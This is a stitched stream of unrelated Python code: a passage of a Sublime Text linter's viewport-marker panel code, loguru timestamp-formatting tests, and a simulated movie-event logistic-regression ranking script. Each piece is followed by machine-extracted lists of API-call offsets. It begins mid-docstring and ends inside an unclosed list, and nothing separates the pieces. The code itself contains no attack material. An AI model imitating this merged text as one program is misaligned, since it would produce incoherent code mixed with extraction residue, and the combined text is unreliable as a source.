    We draw a region 'dangle' (a region of length 0 at the start of a line)
    *at* the given `line` which usually appears as if it were slightly below
    the current line, or between this and the next line.

    Basically a visual hack.
    """
    if line is None:
        panel.erase_regions(CURSOR_MARKER_KEY)
        return

    # NOTE(review): the dangle is anchored at `line - 1` — presumably so
    # the underline renders below that line; confirm against the UI.
    line_start = panel.text_point(line - 1, 0)
    region = sublime.Region(line_start, line_start)
    draw_region_dangle(panel, CURSOR_MARKER_KEY, CURSOR_MARKER_SCOPE, [region])
# Only draw the viewport marker when a buffer has more errors than this;
# for a handful of errors the marker adds noise, not orientation.
CONFUSION_THRESHOLD = 5
# Region keys / scopes for the "visible viewport" indicator in the panel.
VIEWPORT_MARKER_KEY = 'SL.Panel.ViewportMarker'
VIEWPORT_MARKER_SCOPE = 'region.bluish.visible_viewport.sublime_linter'
VIEWPORT_BACKGROUND_KEY = 'SL.Panel.ViewportBackground'

# Whether the `update_viewport` poller loop is currently scheduled.
_RUNNING = False
def get_viewport_background_scope():
    """Return the experimental viewport background scope from settings, if set."""
    xperiments = persist.settings.get('xperiments', {})
    return xperiments.get('viewport_background_scope')
def start_viewport_poller():
    """Kick off the `update_viewport` loop unless it is already running."""
    global _RUNNING
    if not _RUNNING:
        _RUNNING = True
        update_viewport()
def stop_viewport_poller():
    """Signal the `update_viewport` loop to stop on its next tick."""
    global _RUNNING
    _RUNNING = False
def update_viewport(token1=None, token2=None):
    """Poller tick: re-render panel/viewport marker when their inputs change.

    `token1`/`token2` are opaque change-detection tokens produced by the
    two helpers below; each helper only does work when its token differs
    from the previous tick's.
    """
    global _RUNNING
    if not _RUNNING:
        return

    next_token1 = mayby_rerender_panel(token1)  # NOTE: "mayby" typo is the helper's actual name
    next_token2 = maybe_render_viewport(token2)
    # Reschedule ourselves roughly every frame (16 ms ≈ 60 fps).
    sublime.set_timeout(partial(update_viewport, next_token1, next_token2), 16)
def mayby_rerender_panel(previous_token):
    # NOTE: "mayby" (sic) — keep the name; `update_viewport` calls it as-is.
    """Refill the panel when the active view's viewport extent changed."""
    view = State['active_view']
    if not view:
        return

    # Change-detection token: only the viewport extent matters here
    # (a resize changes the wrap width of the panel content).
    token = (view.viewport_extent(),)
    if token != previous_token:
        window = view.window()
        if not window:
            return
        fill_panel(window)

    return token
def maybe_render_viewport(previous_token):
    """Redraw the viewport marker when relevant view/panel state changed."""
    view = State['active_view']
    if not view:
        return
    window = view.window()
    if not window:
        return
    panel = get_panel(window)
    if not panel:
        return

    # Change-detection token: any difference triggers a re-render.
    token = (
        view.buffer_id(),
        view.visible_region(),
        panel.change_count(),
        panel.get_regions(CURSOR_MARKER_KEY)
    )
    if token != previous_token:
        render_visible_viewport(panel, view)
    return token
def render_visible_viewport(panel, view):
    # type: (sublime.View, sublime.View) -> None
    """Compute and draw a fancy scrollbar like region on the left...

    ... indicating the current viewport into that file or error(s) list.
    """
    errors = persist.errors.get(view.buffer_id(), [])
    if len(errors) > CONFUSION_THRESHOLD:
        viewport = view.visible_region()
        visible_errors = [
            error
            for error in errors
            if viewport.contains(error['region'])
        ]
        # Only draw when the viewport narrows the list; if *all* errors
        # are visible the marker carries no information.
        if visible_errors and len(visible_errors) != len(errors):
            try:
                visible_errors = sorted(
                    visible_errors, key=lambda error: error['panel_line'])
            # 'panel_line' may not be set yet (see `fill_panel`).
            except KeyError:
                return
            head, end = visible_errors[0], visible_errors[-1]
            head_line = panel.text_point(head['panel_line'][0] - 1, 0)
            end_line = panel.text_point(end['panel_line'][1], 0)
            regions = [
                sublime.Region(head_line, head_line),
                sublime.Region(end_line, end_line)
            ]
            # Don't draw on top of the cursor marker.
            cursor = panel.get_regions(CURSOR_MARKER_KEY)
            regions = [r for r in regions if r not in cursor]
            draw_region_dangle(
                panel, VIEWPORT_MARKER_KEY, VIEWPORT_MARKER_SCOPE, regions)

            # Optional (experimental) full-height background between the
            # two dangles.
            viewport_background_scope = get_viewport_background_scope()
            if viewport_background_scope:
                head_line = panel.text_point(head['panel_line'][0], 0)
                end_line = panel.text_point(end['panel_line'][1] + 1, 0)
                regions = [
                    sublime.Region(r.a, r.a + 1)
                    for r in panel.lines(sublime.Region(head_line, end_line))
                ]
                flags = sublime.DRAW_NO_OUTLINE
                panel.add_regions(
                    VIEWPORT_BACKGROUND_KEY, regions,
                    scope=viewport_background_scope, flags=flags)
            # Marker drawn; skip the erase below.
            return

    panel.erase_regions(VIEWPORT_MARKER_KEY)
    panel.erase_regions(VIEWPORT_BACKGROUND_KEY)
# Render an empty region as a short solid underline "dangle" with no
# fill or outline.
DANGLE_FLAGS = (
    sublime.DRAW_SOLID_UNDERLINE | sublime.DRAW_NO_FILL |
    sublime.DRAW_NO_OUTLINE | sublime.DRAW_EMPTY_AS_OVERWRITE)
def draw_region_dangle(view, key, scope, regions):
    # type: (sublime.View, str, str, List[sublime.Region]) -> None
    """Add `regions` to `view` drawn in the dangle style (see DANGLE_FLAGS)."""
    view.add_regions(key, regions, scope=scope, flags=DANGLE_FLAGS)
| [
"sublime.windows",
"sublime.active_window",
"os.path.dirname",
"sublime.set_timeout",
"functools.partial",
"os.path.commonprefix",
"sublime.load_resource",
"mypy_extensions.TypedDict",
"sublime.Region",
"os.path.relpath"
] | [((379, 511), 'mypy_extensions.TypedDict', 'TypedDict', (['"""State_"""', "{'active_view': Optional[sublime.View], 'cursor': int,\n 'panel_opened_automatically': Set[sublime.WindowId]}"], {}), "('State_', {'active_view': Optional[sublime.View], 'cursor': int,\n 'panel_opened_automatically': Set[sublime.WindowId]})\n", (388, 511), False, 'from mypy_extensions import TypedDict\n'), ((834, 857), 'sublime.active_window', 'sublime.active_window', ([], {}), '()\n', (855, 857), False, 'import sublime\n'), ((1085, 1102), 'sublime.windows', 'sublime.windows', ([], {}), '()\n', (1100, 1102), False, 'import sublime\n'), ((1337, 1354), 'sublime.windows', 'sublime.windows', ([], {}), '()\n', (1352, 1354), False, 'import sublime\n'), ((9588, 9615), 'os.path.commonprefix', 'os.path.commonprefix', (['paths'], {}), '(paths)\n', (9608, 9615), False, 'import os\n'), ((9627, 9655), 'os.path.dirname', 'os.path.dirname', (['common_path'], {}), '(common_path)\n', (9642, 9655), False, 'import os\n'), ((19545, 19583), 'sublime.Region', 'sublime.Region', (['line_start', 'line_start'], {}), '(line_start, line_start)\n', (19559, 19583), False, 'import sublime\n'), ((6915, 6949), 'sublime.load_resource', 'sublime.load_resource', (['syntax_path'], {}), '(syntax_path)\n', (6936, 6949), False, 'import sublime\n'), ((20428, 20478), 'functools.partial', 'partial', (['update_viewport', 'next_token1', 'next_token2'], {}), '(update_viewport, next_token1, next_token2)\n', (20435, 20478), False, 'from functools import partial\n'), ((8883, 8918), 'os.path.relpath', 'os.path.relpath', (['abs_path', 'base_dir'], {}), '(abs_path, base_dir)\n', (8898, 8918), False, 'import os\n'), ((4481, 4523), 'sublime.set_timeout', 'sublime.set_timeout', (['start_viewport_poller'], {}), '(start_viewport_poller)\n', (4500, 4523), False, 'import sublime\n'), ((22271, 22307), 'sublime.Region', 'sublime.Region', (['head_line', 'head_line'], {}), '(head_line, head_line)\n', (22285, 22307), False, 'import sublime\n'), 
((22325, 22359), 'sublime.Region', 'sublime.Region', (['end_line', 'end_line'], {}), '(end_line, end_line)\n', (22339, 22359), False, 'import sublime\n'), ((22909, 22937), 'sublime.Region', 'sublime.Region', (['r.a', '(r.a + 1)'], {}), '(r.a, r.a + 1)\n', (22923, 22937), False, 'import sublime\n'), ((22979, 23014), 'sublime.Region', 'sublime.Region', (['head_line', 'end_line'], {}), '(head_line, end_line)\n', (22993, 23014), False, 'import sublime\n')] |
import datetime
import re
import sys
import freezegun
import pytest
from loguru import logger
# Pythons before 3.6 render the UTC tzname with an explicit offset.
if sys.version_info < (3, 6):
    UTC_NAME = "UTC+00:00"
else:
    UTC_NAME = "UTC"
# Each case: (format spec, frozen datetime, (tz name, utc offset in s), expected).
# Both strftime-style (%-tokens) and loguru-style tokens are covered, as is
# the `!UTC` modifier and `[...]` literal escaping.
@pytest.mark.parametrize(
    "time_format, date, timezone, expected",
    [
        (
            "%Y-%m-%d %H-%M-%S %f %Z %z",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 UTC +0000",
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 UTC +0000",
        ),
        (
            "%Y-%m-%d %H-%M-%S %f %Z %z",
            "2018-06-09 01:02:03.000045",
            ("EST", -18000),
            "2018-06-09 01-02-03 000045 EST -0500",
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ",
            "2018-06-09 01:02:03.000045",
            ("EST", -18000),
            "2018-06-09 01-02-03 000045 EST -0500",
        ),
        (
            "%Y-%m-%d %H-%M-%S %f %Z!UTC",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 %s" % UTC_NAME,
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC",
            "2018-06-09 01:02:03.000045",
            ("UTC", 0),
            "2018-06-09 01-02-03 000045 %s" % UTC_NAME,
        ),
        (
            "%Y-%m-%d %H-%M-%S %f %Z %z!UTC",
            "2018-06-09 01:02:03.000045",
            ("EST", -18000),
            "2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
        ),
        (
            "YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC",
            "2018-06-09 01:02:03.000045",
            ("UTC", -18000),
            "2018-06-09 06-02-03 000045 %s +0000" % UTC_NAME,
        ),
        (
            "YY-M-D H-m-s SSS Z",
            "2005-04-07 09:03:08.002320",
            ("A", 3600),
            "05-4-7 9-3-8 002 +01:00",
        ),
        (
            "Q_DDDD_DDD d_E h_hh A SS ZZ",
            "2000-01-01 14:00:00.9",
            ("B", -1800),
            "1_001_1 5_6 2_02 PM 90 -0030",
        ),
        ("hh A", "2018-01-01 00:01:02.000003", ("UTC", 0), "12 AM"),
        ("hh A", "2018-01-01 12:00:00.0", ("UTC", 0), "12 PM"),
        ("hh A", "2018-01-01 23:00:00.0", ("UTC", 0), "11 PM"),
        ("[YYYY] MM [DD]", "2018-02-03 11:09:00.000002", ("UTC", 0), "YYYY 02 DD"),
        ("[YYYY MM DD]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[2018 01 03]"),
        ("[[YY]]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[YY]"),
        ("[]", "2018-01-03 11:03:04.000002", ("UTC", 0), "[]"),
        ("[HHmmss", "2018-01-03 11:03:04.000002", ("UTC", 0), "[110304"),
        ("HHmmss]", "2018-01-03 11:03:04.000002", ("UTC", 0), "110304]"),
        ("HH:mm:ss!UTC", "2018-01-01 11:30:00.0", ("A", 7200), "09:30:00"),
        ("UTC! HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "UTC! 11:30:00"),
        ("!UTC HH:mm:ss", "2018-01-01 11:30:00.0", ("A", 7200), "!UTC 11:30:00"),
        (
            "hh:mm:ss A - Z ZZ !UTC",
            "2018-01-01 12:30:00.0",
            ("A", 5400),
            "11:00:00 AM - +00:00 +0000 ",
        ),
        (
            "YYYY-MM-DD HH:mm:ss[Z]!UTC",
            "2018-01-03 11:03:04.2",
            ("XYZ", -7200),
            "2018-01-03 13:03:04Z",
        ),
        ("HH:mm:ss[!UTC]", "2018-01-01 11:30:00.0", ("A", 7200), "11:30:00!UTC"),
        ("", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T11:09:00.000002+0030"),
        ("!UTC", "2018-02-03 11:09:00.000002", ("Z", 1800), "2018-02-03T10:39:00.000002+0000"),
    ],
)
def test_formatting(writer, freeze_time, time_format, date, timezone, expected):
    """A log record's {time:...} spec renders `date` as `expected`."""
    with freeze_time(date, timezone):
        logger.add(writer, format="{time:%s}" % time_format)
        logger.debug("X")
        result = writer.read()
        assert result == expected + "\n"
def test_locale_formatting(writer, freeze_time):
    """The MMMM/MMM/dddd/ddd tokens must match strftime's locale names."""
    moment = datetime.datetime(2011, 1, 1, 22, 22, 22, 0)
    with freeze_time(moment):
        logger.add(writer, format="{time:MMMM MMM dddd ddd}")
        logger.debug("Test")
        assert writer.read() == moment.strftime("%B %b %A %a\n")
def test_stdout_formatting(freeze_time, capsys):
    """A stdout sink renders the time with the frozen timezone offset."""
    with freeze_time("2015-12-25 19:13:18", ("A", 5400)):
        logger.add(sys.stdout, format="{time:YYYY [MM] DD HHmmss Z} {message}")
        logger.debug("Y")

        captured = capsys.readouterr()
        assert captured.out == "2015 MM 25 191318 +01:30 Y\n"
        assert captured.err == ""
def test_file_formatting(freeze_time, tmp_path):
    """Time tokens in a file-sink path are expanded when the sink is added."""
    with freeze_time("2015-12-25 19:13:18", ("A", -5400)):
        logger.add(tmp_path / "{time:YYYY [MM] DD HHmmss ZZ}.log")
        logger.debug("Z")

        expected = tmp_path / "2015 MM 25 191318 -0130.log"
        assert list(tmp_path.iterdir()) == [expected]
def test_missing_struct_time_fields(writer, freeze_time):
    """Formatting still produces an offset/zone when tm_zone is unavailable."""
    with freeze_time("2011-01-02 03:04:05.6", include_tm_zone=False):
        logger.add(writer, format="{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}")
        logger.debug("X")

        output = writer.read()
        assert re.fullmatch(r"2011 01 02 03 04 05 600000 [+-]\d{4} .*\n", output)
def test_freezegun_mocking(writer):
    """loguru picks up time frozen via the third-party freezegun library."""
    logger.add(writer, format="[{time:YYYY MM DD HH:mm:ss}] {message}")

    with freezegun.freeze_time("2000-01-01 18:00:05"):
        logger.info("Frozen")

    assert writer.read() == "[2000 01 01 18:00:05] Frozen\n"
| [
"datetime.datetime",
"loguru.logger.add",
"loguru.logger.debug",
"loguru.logger.info",
"re.fullmatch",
"pytest.mark.parametrize",
"freezegun.freeze_time"
] | [((184, 2850), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""time_format, date, timezone, expected"""', "[('%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 UTC +0000'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 UTC +0000'), (\n '%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('EST', -\n 18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'EST', -18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n '%Y-%m-%d %H-%M-%S %f %Z!UTC', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n '%Y-%m-%d %H-%M-%S %f %Z %z!UTC', '2018-06-09 01:02:03.000045', ('EST',\n -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YY-M-D H-m-s SSS Z', '2005-04-07 09:03:08.002320', ('A', 3600),\n '05-4-7 9-3-8 002 +01:00'), ('Q_DDDD_DDD d_E h_hh A SS ZZ',\n '2000-01-01 14:00:00.9', ('B', -1800), '1_001_1 5_6 2_02 PM 90 -0030'),\n ('hh A', '2018-01-01 00:01:02.000003', ('UTC', 0), '12 AM'), ('hh A',\n '2018-01-01 12:00:00.0', ('UTC', 0), '12 PM'), ('hh A',\n '2018-01-01 23:00:00.0', ('UTC', 0), '11 PM'), ('[YYYY] MM [DD]',\n '2018-02-03 11:09:00.000002', ('UTC', 0), 'YYYY 02 DD'), (\n '[YYYY MM DD]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[2018 01 03]'), ('[[YY]]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[YY]'), ('[]', '2018-01-03 11:03:04.000002', ('UTC', 0), '[]'), (\n '[HHmmss', '2018-01-03 11:03:04.000002', ('UTC', 0), '[110304'), (\n 'HHmmss]', '2018-01-03 11:03:04.000002', ('UTC', 0), '110304]'), (\n 'HH:mm:ss!UTC', '2018-01-01 
11:30:00.0', ('A', 7200), '09:30:00'), (\n 'UTC! HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), 'UTC! 11:30:00'),\n ('!UTC HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), '!UTC 11:30:00'\n ), ('hh:mm:ss A - Z ZZ !UTC', '2018-01-01 12:30:00.0', ('A', 5400),\n '11:00:00 AM - +00:00 +0000 '), ('YYYY-MM-DD HH:mm:ss[Z]!UTC',\n '2018-01-03 11:03:04.2', ('XYZ', -7200), '2018-01-03 13:03:04Z'), (\n 'HH:mm:ss[!UTC]', '2018-01-01 11:30:00.0', ('A', 7200), '11:30:00!UTC'),\n ('', '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T11:09:00.000002+0030'), ('!UTC',\n '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T10:39:00.000002+0000')]"], {}), "('time_format, date, timezone, expected', [(\n '%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 UTC +0000'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 UTC +0000'), (\n '%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('EST', -\n 18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'EST', -18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n '%Y-%m-%d %H-%M-%S %f %Z!UTC', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n '%Y-%m-%d %H-%M-%S %f %Z %z!UTC', '2018-06-09 01:02:03.000045', ('EST',\n -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YY-M-D H-m-s SSS Z', '2005-04-07 09:03:08.002320', ('A', 3600),\n '05-4-7 9-3-8 002 +01:00'), ('Q_DDDD_DDD d_E h_hh A SS ZZ',\n '2000-01-01 14:00:00.9', ('B', -1800), '1_001_1 5_6 2_02 PM 90 -0030'),\n ('hh A', '2018-01-01 00:01:02.000003', ('UTC', 0), 
'12 AM'), ('hh A',\n '2018-01-01 12:00:00.0', ('UTC', 0), '12 PM'), ('hh A',\n '2018-01-01 23:00:00.0', ('UTC', 0), '11 PM'), ('[YYYY] MM [DD]',\n '2018-02-03 11:09:00.000002', ('UTC', 0), 'YYYY 02 DD'), (\n '[YYYY MM DD]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[2018 01 03]'), ('[[YY]]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[YY]'), ('[]', '2018-01-03 11:03:04.000002', ('UTC', 0), '[]'), (\n '[HHmmss', '2018-01-03 11:03:04.000002', ('UTC', 0), '[110304'), (\n 'HHmmss]', '2018-01-03 11:03:04.000002', ('UTC', 0), '110304]'), (\n 'HH:mm:ss!UTC', '2018-01-01 11:30:00.0', ('A', 7200), '09:30:00'), (\n 'UTC! HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), 'UTC! 11:30:00'),\n ('!UTC HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), '!UTC 11:30:00'\n ), ('hh:mm:ss A - Z ZZ !UTC', '2018-01-01 12:30:00.0', ('A', 5400),\n '11:00:00 AM - +00:00 +0000 '), ('YYYY-MM-DD HH:mm:ss[Z]!UTC',\n '2018-01-03 11:03:04.2', ('XYZ', -7200), '2018-01-03 13:03:04Z'), (\n 'HH:mm:ss[!UTC]', '2018-01-01 11:30:00.0', ('A', 7200), '11:30:00!UTC'),\n ('', '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T11:09:00.000002+0030'), ('!UTC',\n '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T10:39:00.000002+0000')])\n", (207, 2850), False, 'import pytest\n'), ((3954, 3998), 'datetime.datetime', 'datetime.datetime', (['(2011)', '(1)', '(1)', '(22)', '(22)', '(22)', '(0)'], {}), '(2011, 1, 1, 22, 22, 22, 0)\n', (3971, 3998), False, 'import datetime\n'), ((5187, 5254), 'loguru.logger.add', 'logger.add', (['writer'], {'format': '"""[{time:YYYY MM DD HH:mm:ss}] {message}"""'}), "(writer, format='[{time:YYYY MM DD HH:mm:ss}] {message}')\n", (5197, 5254), False, 'from loguru import logger\n'), ((3743, 3795), 'loguru.logger.add', 'logger.add', (['writer'], {'format': "('{time:%s}' % time_format)"}), "(writer, format='{time:%s}' % time_format)\n", (3753, 3795), False, 'from loguru import logger\n'), ((3804, 3821), 'loguru.logger.debug', 'logger.debug', (['"""X"""'], {}), "('X')\n", 
(3816, 3821), False, 'from loguru import logger\n'), ((4033, 4086), 'loguru.logger.add', 'logger.add', (['writer'], {'format': '"""{time:MMMM MMM dddd ddd}"""'}), "(writer, format='{time:MMMM MMM dddd ddd}')\n", (4043, 4086), False, 'from loguru import logger\n'), ((4095, 4115), 'loguru.logger.debug', 'logger.debug', (['"""Test"""'], {}), "('Test')\n", (4107, 4115), False, 'from loguru import logger\n'), ((4294, 4365), 'loguru.logger.add', 'logger.add', (['sys.stdout'], {'format': '"""{time:YYYY [MM] DD HHmmss Z} {message}"""'}), "(sys.stdout, format='{time:YYYY [MM] DD HHmmss Z} {message}')\n", (4304, 4365), False, 'from loguru import logger\n'), ((4374, 4391), 'loguru.logger.debug', 'logger.debug', (['"""Y"""'], {}), "('Y')\n", (4386, 4391), False, 'from loguru import logger\n'), ((4627, 4685), 'loguru.logger.add', 'logger.add', (["(tmp_path / '{time:YYYY [MM] DD HHmmss ZZ}.log')"], {}), "(tmp_path / '{time:YYYY [MM] DD HHmmss ZZ}.log')\n", (4637, 4685), False, 'from loguru import logger\n'), ((4694, 4711), 'loguru.logger.debug', 'logger.debug', (['"""Z"""'], {}), "('Z')\n", (4706, 4711), False, 'from loguru import logger\n'), ((4936, 5004), 'loguru.logger.add', 'logger.add', (['writer'], {'format': '"""{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}"""'}), "(writer, format='{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}')\n", (4946, 5004), False, 'from loguru import logger\n'), ((5013, 5030), 'loguru.logger.debug', 'logger.debug', (['"""X"""'], {}), "('X')\n", (5025, 5030), False, 'from loguru import logger\n'), ((5078, 5145), 're.fullmatch', 're.fullmatch', (['"""2011 01 02 03 04 05 600000 [+-]\\\\d{4} .*\\\\n"""', 'result'], {}), "('2011 01 02 03 04 05 600000 [+-]\\\\d{4} .*\\\\n', result)\n", (5090, 5145), False, 'import re\n'), ((5265, 5309), 'freezegun.freeze_time', 'freezegun.freeze_time', (['"""2000-01-01 18:00:05"""'], {}), "('2000-01-01 18:00:05')\n", (5286, 5309), False, 'import freezegun\n'), ((5319, 5340), 'loguru.logger.info', 'logger.info', (['"""Frozen"""'], 
{}), "('Frozen')\n", (5330, 5340), False, 'from loguru import logger\n')] |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.linear_model import LogisticRegression
import pdb
from sklearn.metrics import *
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.preprocessing import StandardScaler
import itertools
import json
import pickle
class User:
    """A synthetic user accumulating positive/negative movie choices."""

    def __init__(self, id):
        self.id = id
        self.positive, self.negative = [], []

    def add_positive(self, movie_id):
        """Record a movie this user responded positively to."""
        self.positive.append(movie_id)

    def add_negative(self, movie_id):
        """Record a movie this user skipped."""
        self.negative.append(movie_id)

    def get_positive(self):
        """Return the list of positively rated movie ids."""
        return self.positive

    def get_negative(self):
        """Return the list of negatively rated movie ids."""
        return self.negative
np.random.seed(1)
class EventsGenerator:
    """Simulate user sessions to produce labelled training events.

    Each user opens `opened` random movies and "buys" each with the
    per-movie `buy_probability`, yielding feature rows labelled 1/0.
    """

    NUM_OF_USERS = 1

    def __init__(self, learning_data, buy_probability, opened):
        # learning_data: movie features indexed by movie id (DataFrame).
        # buy_probability: per-movie positive probability, indexed like
        #   learning_data -- presumably a pandas Series; TODO confirm.
        # opened: number of movies each simulated user opens.
        self.learning_data = learning_data
        self.buy_probability = buy_probability
        self.users = []
        self.NUM_OF_OPENED_MOVIES_PER_USER = opened
        for id in range(1, self.NUM_OF_USERS+1):
            self.users.append(User(id))

    def run(self, pairwise=False):
        """Generate events for every user; return them as a DataFrame.

        NOTE(review): the `pairwise` flag is currently unused.
        """
        for user in self.users:
            # Sample (with replacement) the movies this user opens.
            opened_movies = np.random.choice(self.learning_data.index.values, self.NUM_OF_OPENED_MOVIES_PER_USER)
            self.__add_positives_and_negatives_to(user, opened_movies)
        return self.__build_events_data()

    def __add_positives_and_negatives_to(self, user, opened_movies):
        # Draw one Bernoulli outcome per opened movie.
        for movie_id in opened_movies:
            if np.random.binomial(1, self.buy_probability.loc[movie_id]):
                user.add_positive(movie_id)
            else:
                user.add_negative(movie_id)

    def __build_events_data(self):
        # Flatten the users' positive/negative lists into feature rows
        # with an 'outcome' label (1 = bought, 0 = not).
        events_data = []
        for user in self.users:
            for positive_id in user.get_positive():
                tmp = self.learning_data.loc[positive_id].to_dict()
                tmp['outcome'] = 1
                events_data += [tmp]
            for negative_id in user.get_negative():
                tmp = self.learning_data.loc[negative_id].to_dict()
                tmp['outcome'] = 0
                events_data += [tmp]
        return pd.DataFrame(events_data)
def build_learning_data_from(movie_data):
    """Standardize every feature column of *movie_data*.

    The 'top_prob' column is excluded from the features; each remaining
    column is scaled independently to zero mean and unit variance.

    Returns a ``(scaled_data, feature_columns)`` tuple.
    """
    feature_columns = np.setdiff1d(movie_data.columns, np.array(['top_prob']))
    learning_data = movie_data.loc[:, feature_columns]
    scaler = StandardScaler()
    # Refitting the scaler per column is equivalent to column-wise
    # standardization of the whole frame.
    for column in feature_columns:
        learning_data[column] = scaler.fit_transform(learning_data[[column]])
    return learning_data, feature_columns
def get_test_train_data(events_data, feature_columns):
    """Split the event data into [X_train, X_test, y_train, y_test] (80/20).

    Features come from *feature_columns*; the label is the 'outcome' column.
    """
    features = events_data.loc[:, feature_columns].values.astype(np.float32)
    outcomes = events_data.loc[:, ['outcome']].values.astype(np.float32).ravel()
    # A fixed random_state keeps the split reproducible across runs.
    return list(train_test_split(features, outcomes, test_size=0.2, random_state=42))
def get_predicted_outcome(model, data):
    """Return the most likely class for each row of *data*, as float32.

    Takes the argmax over the class-probability columns of
    ``model.predict_proba``.
    """
    probabilities = model.predict_proba(data)
    return np.argmax(probabilities, axis=1).astype(np.float32)
def get_predicted_rank(model, data):
    """Return the positive-class probability of each row, used as a ranking score."""
    probabilities = model.predict_proba(data)
    return probabilities[:, 1]
def train_model(model, prediction_function, X_train, y_train, X_test, y_test):
    """Fit *model* and report precision/recall/accuracy on both splits.

    Returns ``(model, train_precision, train_recall, train_accuracy,
    test_precision, test_recall, test_accuracy)``.
    """
    model.fit(X_train, y_train)
    train_predictions = prediction_function(model, X_train)
    test_predictions = prediction_function(model, X_test)
    train_metrics = (
        precision_score(y_train, train_predictions),
        recall_score(y_train, train_predictions),
        accuracy_score(y_train, train_predictions),
    )
    test_metrics = (
        precision_score(y_test, test_predictions),
        recall_score(y_test, test_predictions),
        accuracy_score(y_test, test_predictions),
    )
    return (model,) + train_metrics + test_metrics
def decide_rank(model, learning_data, predict_fun):
    """Return a copy of *learning_data* with a 'rank' column added.

    The ranks are computed by ``predict_fun(model, features)`` on the
    float32 feature matrix; the input frame is left unmodified.
    """
    model_input = learning_data.values.astype(np.float32)
    ranked = learning_data.copy()
    ranked['rank'] = predict_fun(model, model_input)
    return ranked
"sklearn.model_selection.train_test_split",
"numpy.random.choice",
"sklearn.preprocessing.StandardScaler",
"numpy.array",
"numpy.random.seed",
"pandas.DataFrame",
"numpy.random.binomial"
